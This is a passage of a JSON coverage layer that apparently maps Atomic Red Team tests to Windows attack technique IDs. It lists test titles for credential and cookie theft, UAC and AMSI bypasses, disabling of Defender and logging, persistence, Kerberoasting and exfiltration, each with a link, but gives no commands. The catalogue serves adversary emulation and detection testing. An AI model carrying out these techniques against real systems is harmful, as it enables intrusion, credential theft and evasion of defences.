Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":5,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":3,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":24,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":13,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":54,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":31,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View 